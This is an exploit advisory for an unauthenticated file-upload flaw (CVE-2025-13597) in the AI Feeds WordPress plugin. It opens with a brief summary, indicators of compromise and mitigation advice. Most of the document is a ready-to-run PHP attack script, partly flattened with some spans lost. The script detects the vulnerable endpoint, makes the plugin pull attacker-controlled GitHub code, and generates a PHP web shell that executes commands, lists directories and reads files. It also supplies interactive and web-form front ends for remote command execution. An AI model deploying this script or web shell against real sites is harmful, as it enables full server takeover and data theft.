=============================================================================================================================================
| # Title : AI Feeds 1.0.11 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://ai.cibeles.net/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/212113/ & CVE-2025-13597
[+] Summary : An unauthenticated arbitrary file upload vulnerability affects the AI Feeds plugin for WordPress, versions 1.0.11 and earlier. It allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by abusing the plugin's GitHub integration functionality, leading to remote code execution and complete server compromise. The vulnerability is in the actualizador_git.php file, which gives unauthenticated callers the ability to download and execute files from arbitrary GitHub repositories without proper security controls. On an affected site, exploitation appears as requests to /wp-content/plugins/ai-feeds/actualizador_git.php carrying owner, repo, ref and token query parameters, followed by new PHP files in the plugin directory. Sites running 1.0.11 or earlier should disable the plugin or block web access to that file until a fixed release is confirmed.
[+] POC :
# Execute a single command `php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell `php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo `php poc.php --create-shell`
#!/usr/bin/env php target = rtrim($target_url, '/'); } public function check_vulnerability() { echo "[*] Checking if target is vulnerable...\n"; // Check if AI Feeds plugin exists $plugin_path = $this->target . '/wp-content/plugins/ai-feeds/'; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); // Check for plugin directory $response = @file_get_contents($plugin_path, false, $context); if ($response === false) { // Check for actualizador_git.php directly $exploit_url = $this->target . 
'/wp-content/plugins/ai-feeds/actualizador_git.php'; $response = @file_get_contents($exploit_url, false, $context); if ($response !== false) { echo "[+] AI Feeds plugin detected - likely vulnerable\n"; return true; } } else { echo "[+] AI Feeds plugin directory found - likely vulnerable\n"; return true; } echo "[-] AI Feeds plugin not found or not accessible\n"; return false; } public function exploit($owner, $repo, $token, $command = 'whoami') { echo "[*] Exploiting actualizador_git.php vulnerability...\n"; echo "[*] Target: " . $this->target . "\n"; echo "[*] GitHub Repository: {$owner}/{$repo}\n"; $exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php'; $params = [ 'owner' => $owner, 'repo' => $repo, 'ref' => 'main', 'token' => $token ]; $query_string = http_build_query($params); $full_url = $exploit_url . '?' . $query_string; echo "[*] Sending exploit request...\n"; echo "[*] URL: " . $full_url . "\n"; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = @file_get_contents($full_url, false, $context); if ($response === false) { echo "[-] Exploit request failed\n"; return false; } echo "[+] Exploit executed. Response:\n"; echo $response . "\n"; // Test shell access echo "\n[*] Testing shell access...\n"; $this->test_shell($command); return true; } private function test_shell($command) { $shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php'; $test_url = $shell_url . '?cmd=' . 
urlencode($command); echo "[*] Testing command: {$command}\n"; echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n"; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = @file_get_contents($test_url, false, $context); if ($response === false) { echo "[-] Shell not accessible or command failed\n"; } else { echo "[+] Command output:\n"; echo $response . "\n"; } } public function create_malicious_repo() { echo "[*] Creating malicious shell.php for GitHub repository...\n"; $shell_content = ''; file_put_contents('shell.php', $shell_content); echo "[+] Created shell.php - upload this to your GitHub repository\n"; echo "[+] Repository structure should be: /shell.php in main branch\n"; // Also create a more advanced shell $advanced_shell = '&1", $output, $return_code); return implode("\n", $output); } public function listFiles($dir = ".") { return scandir($dir); } public function readFile($file) { return file_get_contents($file); } } $ai_shell = new AIShell(); if(isset($_GET[\'action\'])) { switch($_GET[\'action\']) { case \'exec\': echo $ai_shell->execute($_GET[\'cmd\']); break; case \'ls\': $dir = isset($_GET[\'dir\']) ? $_GET[\'dir\'] : \'.\'; print_r($ai_shell->listFiles($dir)); break; case \'cat\': if(isset($_GET[\'file\'])) { echo $ai_shell->readFile($_GET[\'file\']); } break; default: echo "Available actions: exec, ls, cat"; } } else { echo "AI Feeds Web Shell - Ready"; } ?>'; file_put_contents('advanced_shell.php', $advanced_shell); echo "[+] Created advanced_shell.php with more features\n"; } public function interactive_shell() { $shell_url = $this->target . 
'/wp-content/plugins/ai-feeds/shell.php'; echo "[+] Starting interactive shell...\n"; echo "[+] Shell URL: {$shell_url}\n"; echo "[+] Type 'exit' to quit\n\n"; while (true) { echo "cmd> "; $command = trim(fgets(STDIN)); if ($command === 'exit') { break; } if (!empty($command)) { $test_url = $shell_url . '?cmd=' . urlencode($command); $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10 ] ]); $response = @file_get_contents($test_url, false, $context); if ($response !== false) { echo $response . "\n"; } else { echo "[-] Command failed or shell not accessible\n"; } } } } public function advanced_shell() { $shell_url = $this->target . '/wp-content/plugins/ai-feeds/advanced_shell.php'; echo "[+] Starting advanced shell...\n"; echo "[+] Available commands:\n"; echo " ?action=exec&cmd=COMMAND - Execute command\n"; echo " ?action=ls&dir=DIRECTORY - List files\n"; echo " ?action=cat&file=FILENAME - Read file\n"; echo "[+] Type 'exit' to quit\n\n"; while (true) { echo "ai-feeds> "; $input = trim(fgets(STDIN)); if ($input === 'exit') { break; } if (!empty($input)) { if (strpos($input, 'ls') === 0) { $parts = explode(' ', $input); $dir = isset($parts[1]) ? $parts[1] : '.'; $test_url = $shell_url . '?action=ls&dir=' . urlencode($dir); } elseif (strpos($input, 'cat') === 0) { $parts = explode(' ', $input); if (isset($parts[1])) { $test_url = $shell_url . '?action=cat&file=' . urlencode($parts[1]); } else { echo "Usage: cat filename\n"; continue; } } else { $test_url = $shell_url . '?action=exec&cmd=' . urlencode($input); } $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10 ] ]); $response = @file_get_contents($test_url, false, $context); if ($response !== false) { echo $response . 
"\n"; } else { echo "[-] Command failed or advanced shell not accessible\n"; } } } } } // Command line interface if (php_sapi_name() === 'cli') { echo " ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗ ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║ ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║ ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ AI Feeds <= 1.0.11 Unauthenticated RCE Exploit (CVE-2025-13597) By: indoushka \n"; $options = getopt("t:o:r:k:c:iah", [ "target:", "owner:", "repo:", "token:", "command:", "interactive", "advanced", "help", "create-shell" ]); if (isset($options['h']) || isset($options['help']) || $argc == 1) { echo "Usage: php ai_feeds_exploit.php [options]\n"; echo "Options:\n"; echo " -t, --target Target URL (required)\n"; echo " -o, --owner GitHub repository owner (required)\n"; echo " -r, --repo GitHub repository name (required)\n"; echo " -k, --token GitHub Personal Access Token (required)\n"; echo " -c, --command Command to execute (default: whoami)\n"; echo " -i, --interactive Start interactive shell\n"; echo " -a, --advanced Use advanced shell features\n"; echo " --create-shell Create malicious shell.php for GitHub repo\n"; echo " -h, --help Show this help message\n"; echo "\nExamples:\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -a\n"; echo " php ai_feeds_exploit.php --create-shell\n"; exit(1); } if (isset($options['create-shell'])) { $exploit = new AIFeedsExploit(''); $exploit->create_malicious_repo(); exit(0); } if (!isset($options['t']) && !isset($options['target'])) { echo "Error: Target URL is 
required\n"; exit(1); } if (!isset($options['o']) && !isset($options['owner'])) { echo "Error: GitHub owner is required\n"; exit(1); } if (!isset($options['r']) && !isset($options['repo'])) { echo "Error: GitHub repository is required\n"; exit(1); } if (!isset($options['k']) && !isset($options['token'])) { echo "Error: GitHub token is required\n"; exit(1); } $target = isset($options['t']) ? $options['t'] : $options['target']; $owner = isset($options['o']) ? $options['o'] : $options['owner']; $repo = isset($options['r']) ? $options['r'] : $options['repo']; $token = isset($options['k']) ? $options['k'] : $options['token']; $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami'); $exploit = new AIFeedsExploit($target); // Check vulnerability first if (!$exploit->check_vulnerability()) { echo "[-] Target does not appear to be vulnerable\n"; exit(1); } if (isset($options['a']) || isset($options['advanced'])) { // Use advanced shell $exploit->exploit($owner, $repo, $token, 'echo "Advanced shell installed"'); $exploit->advanced_shell(); } elseif (isset($options['i']) || isset($options['interactive'])) { // Interactive shell $exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"'); $exploit->interactive_shell(); } else { // Single command execution $exploit->exploit($owner, $repo, $token, $command); } } else { // Web interface if (isset($_POST['exploit'])) { $target = $_POST['target'] ?? ''; $owner = $_POST['owner'] ?? ''; $repo = $_POST['repo'] ?? ''; $token = $_POST['token'] ?? ''; $command = $_POST['command'] ?? 'whoami'; if ($target && $owner && $repo && $token) { $exploit = new AIFeedsExploit($target); ob_start(); $exploit->check_vulnerability(); $exploit->exploit($owner, $repo, $token, $command); $output = ob_get_clean(); echo "
$output"; } else { echo "